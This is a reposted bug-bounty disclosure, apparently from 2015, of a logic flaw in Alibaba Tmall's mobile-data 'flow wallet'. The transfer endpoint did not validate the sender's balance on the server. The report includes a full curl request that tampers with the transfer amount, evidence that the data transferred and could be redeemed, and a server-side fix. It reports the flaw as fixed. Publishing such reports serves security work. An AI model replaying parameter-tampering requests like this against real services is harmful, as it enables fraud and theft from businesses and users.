神刀安全网

阿里漏洞一枚-流量钱包

  • 提交时间: 2015-10-22 11:45:22
  • 漏洞类型:Web安全漏洞 – 设计缺陷/逻辑错误
  • 危害等级:严重
  • 贡献值:100
  • 安全币:600
  • 当前状态: 已修复

漏洞详情:

一、详细说明:其中包括场景、截图、漏洞重现的方法,支付宝相关漏洞,请填写支付宝帐号

在我的淘宝-> 流量钱包中进修流量转账时,查看转账接口, https://aliqin.tmall.com/flowwallet/ajax/myFlowHandsel.do?m=2&recvNick=zhangsan&handselSize=1&reason=& tb_token =ZVwBPgeSto&_input_charset=UTF-8

修改handleselSize,构造请求:

curl 'https://aliqin.tmall.com/flowwallet/ajax/myFlowHandsel.do?m=2&recvNick=zhangsan&handselSize=999999999  &reason=&_tb_token_=ZVwBPgeSto&_input_charset=UTF-8' -H 'Accept: application/json, text/javascript, */*; q=0.01' -H 'Accept-Encoding: gzip, deflate' -H 'Accept-Language: en-US,en;q=0.5' -H 'Connection: keep-alive' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'Cookie: .....'  -H 'DNT: 1' -H 'Host: aliqin.tmall.com' -H 'Referer: https://aliqin.tmall.com/flowwallet/index.htm?spm=a1z02.1.0.1.9xjb05' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:41.0) Gecko/20100101 Firefox/41.0' -H 'X-Requested-With: XMLHttpRequest'

重新提交,可发现原来转出的帐号收到了一笔流量转账,好吧,打太多9了。。。

阿里漏洞一枚-流量钱包

即使转出帐号为0时,亦可转出任意金额到目标账户。

转出任意金额:

「图略」

转出的帐号流量原本为0,查看转入的帐号,收到1M:

阿里漏洞一枚-流量钱包

尝试将流量提取到手机,亦成功。

阿里漏洞一枚-流量钱包 好了。。收回去的时候给我留点。。好不。。阿里手机的流量好贵的说。

二、漏洞证明(在这里写POC):如上。

三、修复方案:对转出账户的流量余额进修校验,不要只在前端输入数值的时候校验。

祝好~其他涉及到流量交易的接口也需要检查一遍。

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 阿里漏洞一枚-流量钱包

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址
分享按钮